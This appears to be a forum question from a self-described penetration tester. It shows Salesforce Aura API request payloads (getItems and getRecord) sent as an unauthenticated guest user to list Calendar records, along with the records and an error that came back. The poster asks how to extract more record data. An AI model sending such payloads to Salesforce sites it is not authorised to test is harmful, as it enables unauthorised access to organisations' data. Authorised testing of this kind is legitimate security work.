# Fetch data from salesforce calendar object using guest user

Tags: salesforce, salesforce-lightning, penetration-testing

I'm a pentester.

When querying Calendar object using

```
message={"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.lists.selectableListDataProvider.SelectableListDataProviderController/ACTION$getItems","callingDescriptor":"UNKNOWN","params":{"entityNameOrId":"Calendar","layoutType":"FULL","pageSize":100,"currentPage":0,"useTimeout":false,"getCount":false,"enableRowActions":false}}]}
```

I got all records, they are like this:

```
{"record":{"LastModifiedDate":"2015-11-25T23:01:12.000Z","CreatedDate":"2015-11-25T23:01:12.000Z","Id":"02315000004yyNiAAI","LastModifiedById":"00515000006AhngAAC","SystemModstamp":"2015-11-25T23:01:12.000Z","Name":null,"sobjectType":"Calendar"}},

{"record":{"LastModifiedDate":"2015-11-25T23:01:12.000Z","CreatedDate":"2015-11-25T23:01:12.000Z","Id":"02315000004yyNjAAI","LastModifiedById":"00515000006AhngAAC","SystemModstamp":"2015-11-25T23:01:12.000Z","Name":null,"sobjectType":"Calendar"}
...
...
..etc,
```

I know there is some text/description written in the GUI interface. But, i don't see any description or anything juicy using above request.

I found getRecord method which retrieves record based on a record id. But, when i submitted it with record id of one of the rows in the calendar object like this:

```
message={"actions":[{"id":"123;a","descriptor":"serviceComponent://ui.force.components.controllers.detail.DetailController/ACTION$getRecord","callingDescriptor":"UNKNOWN","params":{"recordId":"02315000004yyNiAAI","record":null,"inContextOfComponent":"","mode":"VIEW","layoutType":"FULL","defaultFieldValues":null,"navigationLocation":"LIST_VIEW_ROW"}}]}
```

I got

```
"state":"SUCCESS","returnValue":{"onLoadErrorMessage":"This record isn't supported. See your administrator for help."},"error":[
```

The calendar object is accessible with guess user. I wanted to get any text/description written in the records to demonstrate an impact but didn't succeed.

Do you know a way to fetch more data from the records of Calendar object?